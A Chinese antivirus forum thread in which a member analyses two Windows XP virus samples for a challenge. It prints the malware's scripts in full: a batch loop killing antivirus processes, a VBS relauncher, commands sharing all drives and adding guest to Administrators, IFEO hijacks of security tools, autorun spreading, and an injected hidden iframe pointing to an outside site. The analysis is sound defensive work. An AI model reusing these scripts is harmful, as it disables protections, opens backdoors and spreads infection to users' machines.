[Simple Lions]第四关闯关 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛综合娱乐区 活动专区 历史活动 论坛9周年活动专区 [Simple Lions]第四关闯关

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[Simple Lions]第四关闯关

mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	发表于： 2010-03-28 15:46 \| 只看楼主短消息资料字号：小中大 1楼 [Simple Lions]第四关闯关测试环境: microsoft windows xp professional HIPS软件: SSM-2.4.0.622 TinyFirewall-v6.5.120 规则包: 无全默认情况下监控病毒样本1 文件变化: 释放文件 C:\WINDOWS\system.ini C:\WINDOWS\system32\AUTORUN.INF C:\WINDOWS\system32\Avpser.cmd C:\WINDOWS\system32\netshare.cmd C:\WINDOWS\system32\SDGames.exe C:\WINDOWS\system32\Taskeep.vbs system.ini (系统文件,病毒修改)内容: ; for 16-bit app support [drivers] wave=mmdrv.dll timer=timer.drv [mci] [driver32] [386enh] woafont=app936.FON EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [windows] shell=explorer.exe & C:\WINDOWS\system32\SDGames.exe load=C:\WINDOWS\system32\SDGames.exe [Autorun] OPEN=SDGames.exe Shell\Open=打开(^&O) Shell\Open\Command=SDGames.exe Shell\Explore=资源管理器(^&X) Shell\Explore\Command=SDGames.exe netshare.cmd 内容: net share A=A: net share B=B: net share C=C: net share D=D: net share E=E: net share F=F: net share G=G: net share H=H: net share I=I: net share J=J: net share K=K: net share L=L: net share M=M: net share N=N: net share O=O: net share P=P: net share Q=Q: net share R=R: net share S=S: net share T=T: net share U=U: net share V=V: net share W=W: net share X=X: net share Y=Y: net share Z=Z: 此命令开启系统各个盘符共享 avpser.cmd 内容: @echo off :k Set p=taskkill /f /im /t sc config winmgmt start= AUTO & net start winmgmt %p% RavMonD.exe %p% RavStub.exe %p% Anti* %p% AgentSvr* %p% CCenter* %p% Rsaupd* %p% SmartUp* %p% FileDsty* %p% RegClean* %p% 360tray* %p% 360safe* %p% kabaload* %p% safelive* %p% KASTask* %p% kpFW32* %p% kpFW32X* %p% KvXP_1* %p% KVMonXP_1* %p% KvReport* %p% KvXP* %p% KVMonXP* %p% nter* %p% TrojDie* %p% avp.com %p% KRepair.COM %p% Trojan* %p% KvNative* %p% Virus* %p% Filewall* %p% Kaspersky* %p% JiangMin* %p% RavMonD* %p% RavStub* %p% RavTask* %p% adam* %p% cSet* %p% PFWliveUpdate* %p% mmqczj* %p% Trojanwall* %p% Ras.exe %p% runiep.exe %p% avp.exe %p% PFW.exe %p% rising* %p% ikaka* %p% .duba* %p% kingsoft* %p% 木马* %p% 社区* %p% aswBoot* %p% MainCon* %p% Regs* %p% AVP* %p% Task* %p% regedit* %p% Ras* %p% srgui* %p% norton* %p% avp* %p% fire* %p% spy* %p% bullguard* %p% PersFw* %p% KAV* %p% ZONEALARM* %p% SAFEWEB* %p% OUTPOST* %p% ESAFE* %p% clear* %p% BLACKICE* %p% 360safe.exe %p% Shadowservice.exe %p% v3webnt.exe %p% v3sd32.exe %p% v3monsvc.exe %p% sysmonnt.exe %p% hkcmd.exe %p% DNTUS26.EXE %p% AhnSD.exe %p% CTFMON.EXE %p% MonsysNT.exe %p% awrem32.exe %p% WINAW32.EXE %p% PNTIOMON.exe %p% avgw.exe %p% avgcc32.exe %p% PROmon.exe %p% PNTIOMON.exe %p% MagicSet.exe %p% MainCon.exe %p% TrCleaner.exe %p% WmNetPro.exe %p% 修复* %p% 保护* goto k taskeep.vbs 内容: taskeep.vbs on error resume next set Ws = CreateObject("wscript.Shell") count=0 for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ if ps.name="wscript.exe"then count=count+1 next if count > 2 then wscript.quit i=1 for i = 1 to 3 i=i-1 WScript.Sleep(2000) strProcess = "1.exe" Proce = false For each x in getobject("winmgmts:").instancesof("win32_process") If ucase(x.name) = ucase(strProcess) then Proce = true Exit For End If Next If Proce=false then Ws.run "原始病毒运行的路径" WScript.Quit else WScript.Quit End If next 各分区根目录释放(A-Z盘符) X:\Recycleds.url X:\Windows.url X:\新建文件夹.url X:\AUTORUN.INF .url 指向该分区下的SDGames.exe [url=file:///X:/SDGames.exe]file:///X:/SDGames.exe[/url] AUTORUN.INF 内容: [Autorun] OPEN=SDGames.exe Shell\Open=打开(^&O) Shell\Open\Command=SDGames.exe Shell\Explore=资源管理器(^&X) Shell\Explore\Command=SDGames.exe 注册表变动: 创建启动项 [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows] "run"="C:\WINDOWS\system32\SDGames.exe" "load"="C:\WINDOWS\system32\SDGames.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "Winstary"="C:\\WINDOWS\\system32\\SDGames.exe" 劫持 reg 和 txtfile 关联 [HKEY_CLASSES_ROOT\regfile\shell\open\command\] @="C:\\WINDOWS\\system32\\SDGames.exe" [HKEY_CLASSES_ROOT\txtfile\shell\open\command\] @="C:\\WINDOWS\\system32\\SDGames.exe" 写入注册表项禁用CMD [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System] "DisableCMD"=REG_DWORD:00000000 [HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System\DisableCMD] "DisableCMD"=REG_DWORD:00000000 修改注册表注册表项禁用"显示文件和文件夹"和"显示文件扩展名" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden] "HidefileExt"=REG_DWORD:00000001 "ShowSuperHidden"=REG_DWORD:00000001 "SuperHidden"=REG_DWORD:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] "CheckedValue"=dword:00000000 修改注册表禁用"文件夹选项" "控制面板" 和 "设置任务栏" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoFolderOptions"=dword:00000001 "NoControlPanel"=dword:00000001 "NoSetTaskbar"=dword:00000001 修改注册表禁用"注册表功能"和"任务管理器" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistrytools"=dword:00000001 "DisableTaskMgr"=dword:00000001 修改注册表禁用"网络防火墙" [HKLM\SYSTEM\CurrentControlSet\Services\ALG] "Start"=REG_DWORD:00000004 修改注册表禁用"远程桌面服务" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] "Start"=dword:00000002 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] "Start"=dword:00000002 修改注册表禁用/开启"高速缓存" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"=dword:00000000 修改注册表取消"关闭系统"按钮 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShutdownWithoutLogon] "ShutdownWithoutLogon"=dword:00000000 修改注册表禁用"热键" [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] "Hotkey"=dword:00000001 修改注册表"实现文件共享" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] "AutoShareWks"=dword:00000001 "AutoShareServer"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Start ] "Start"=dword:00000004 修改注册表更改"默认IE主页" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page] "Start Page"="http://www.zhidaobaidu.10mb.cn/" "Default_Page_URL"="wangma" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page] "Start Page"="wangma" "Default_Page_URL"="wangma" 修改注册表破坏"安全模式" [HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}] [HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}] 创建 Image File Execution Options 劫持安全相关程序 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe] "Debugger"="360rpt.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] "Debugger"="360Safe.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.EXE] "Debugger"="360tray.EXE" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe] "Debugger"="adam.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe] "Debugger"="AgentSvr.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe] "Debugger"="AppSvc32.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe] "Debugger"="autoruns.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe] "Debugger"="avgrssvc.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe] "Debugger"="AvMonitor.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com] "Debugger"="avp.com" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] "Debugger"="avp.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe] "Debugger"="CCenter.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe] "Debugger"="ccSvcHst.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe] "Debugger"="FileDsty.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe] "Debugger"="FTCleanerShell.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe] "Debugger"="HijackThis.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] "Debugger"="IceSword.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe] "Debugger"="iparmo.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe] "Debugger"="Iparmor.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe] "Debugger"="isPwdSvc.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe] "Debugger"="kabaload.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR] "Debugger"="KaScrScn.SCR" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe] "Debugger"="KASMain.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe] "Debugger"="KASTask.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe] "Debugger"="KAV32.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe] "Debugger"="KAVDX.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe] "Debugger"="KAVPFW.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe] "Debugger"="KAVSetup.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe] "Debugger"="KAVStart.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe] "Debugger"="KISLnchr.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe] "Debugger"="KMailMon.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe] "Debugger"="KMFilter.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Knod32kui.exe] "Debugger"="nod32kui.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe] "Debugger"="KPFW32.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe] "Debugger"="KPFW32X.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe] "Debugger"="KPFWSvc.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe] "Debugger"="KRegEx.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRepair.COM] "Debugger"="KRepair.COM" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe] "Debugger"="KsLoader.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp] "Debugger"="KVCenter.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe] "Debugger"="KvDetect.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe] "Debugger"="KvfwMcl.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp] "Debugger"="KVMonXP.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp] "Debugger"="KVMonXP_1.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe] "Debugger"="kvol.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe] "Debugger"="kvolself.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp] "Debugger"="KvReport.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp] "Debugger"="KVScan.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe] "Debugger"="KVSrvXP.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp] "Debugger"="KVStub.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe] "Debugger"="kvupload.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe] "Debugger"="kvwsc.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp] "Debugger"="KvXP.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp] "Debugger"="KvXP_1.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe] "Debugger"="KWatch.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe] "Debugger"="KWatch9x.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe] "Debugger"="KWatchX.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe] "Debugger"="loaddll.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe] "Debugger"="MagicSet.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MainCon.exe] "Debugger"="MainCon.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe] "Debugger"="mcconsol.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe] "Debugger"="mmqczj.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe] "Debugger"="mmsk.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] "Debugger"="msconfig.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe] "Debugger"="NAVSetup.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe] "Debugger"="nod32krn.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe] "Debugger"="PFW.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe] "Debugger"="PFWLiveUpdate.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe] "Debugger"="QHSET.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe] "Debugger"="QQ.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe] "Debugger"="Ras.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] "Debugger"="Rav.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe] "Debugger"="RavMon.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe] "Debugger"="RavMonD.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe] "Debugger"="RavStub.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe] "Debugger"="RavTask.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe] "Debugger"="RegClean.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe] "Debugger"="rfwcfg.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe] "Debugger"="RfwMain.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe] "Debugger"="rfwProxy.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe] "Debugger"="rfwsrv.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe] "Debugger"="Rsaupd.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe] "Debugger"="runiep.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe] "Debugger"="safelive.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe] "Debugger"="scan32.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Shadowservice.exe] "Debugger"="Shadowservice.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe] "Debugger"="shcfg32.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe] "Debugger"="SmartUp.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe] "Debugger"="SREng.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\srgui.exe] "Debugger"="srgui.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe] "Debugger"="symlcsvc.exe" 用户系统信息：Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 本帖被评分 1 次本帖被评分 1 次麦青儿最后编辑于 2010-04-06 10:27:33
mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	分享到：

mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	发表于： 2010-03-28 15:48 \| 只看楼主短消息资料字号：小中大 2楼回复: [Simple Lions]第四关闯关接上面 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe] "Debugger"="SysSafe.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe] "Debugger"="TrojanDetector.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe] "Debugger"="Trojanwall.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp] "Debugger"="TrojDie.kxp" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe] "Debugger"="UIHost.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe] "Debugger"="UmxAgent.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe] "Debugger"="UmxAttachment.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe] "Debugger"="UmxCfg.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe] "Debugger"="UmxFwHlp.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe] "Debugger"="UmxPol.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe] "Debugger"="UpLive.EXE.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe] "Debugger"="WoptiClean.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe] "Debugger"="zxsweep.exe" 其他行为: 调用 "cmd" "net" "net1" 和 "WScript" 运行以下命令命令行：explorer.exe C:\Documents and Settings\用户名\桌面命令行：cmd /c sc config winmgmt start= AUTO & net start winmgmt & quit 命令行：cmd /c sc config lanmanserver start= AUTO & net start lanmanserver & quit 命令行：sc config winmgmt start= AUTO 命令行：net start winmgmt 命令行：cmd /c sc config Alg Start= disabled & net stop Alg 命令行：sc config lanmanserver start= AUTO 命令行：cmd /c sc config sharedaccess Start= disabled & net stop sharedaccess 命令行：sc config Alg Start= disabled 命令行：sc config sharedaccess Start= disabled 命令行：net user guest /add 命令行：net user guest /active 命令行：net user guest " 命令行：net localgroup Administrators guest 命令行：net localgroup Guests guest /add 命令行：Rundll32.exe url.dll, FileProtocolHandler C:\WINDOWS\system32\Taskeep.vbs 命令行："C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\Taskeep.vbs" 命令行：cmd /c C:\WINDOWS\system32\Avpser.cmd 不间断的运行 avpser.cmd , 关闭安全软件进程不间断的运行以下命令保护 X:\AUTORUN.INF 命令行：cmd /c rd /s /q X:\AUTORUN.INF 系统时间的年份被更改为2030年 %WINDOWS%\system32 被更改为隐藏文件搜索感染除系统盘以外的所有 .exe/.jsp/.asp/.php/.htm/.html/.hta文件感染的 .jsp/.asp/.php/.htm/.html/.hta 网页类文件,添加以下内容 <iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe" align="center" border="0"> 麦青儿最后编辑于 2010-04-06 10:28:36
mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York

mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	发表于： 2010-03-28 15:49 \| 只看楼主短消息资料字号：小中大 3楼回复: [Simple Lions]第四关闯关病毒样本2 文件变化: 释放文件 C:\WINDOWS\Fonts\a513586c6c6c87f70ab58bf916612642\system\svchost.exe 注册表变动: 创建启动项 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "TBMExe"="C:\\WINDOWS\\Fonts\\a513586c6c6c87f70ab58bf916612642\\system\\svchost.exe" 创建 Image File Execution Options 劫持安全相关程序 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\APVXDWIN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.EXE] "Debugger"="c:\\\\xue.exe" 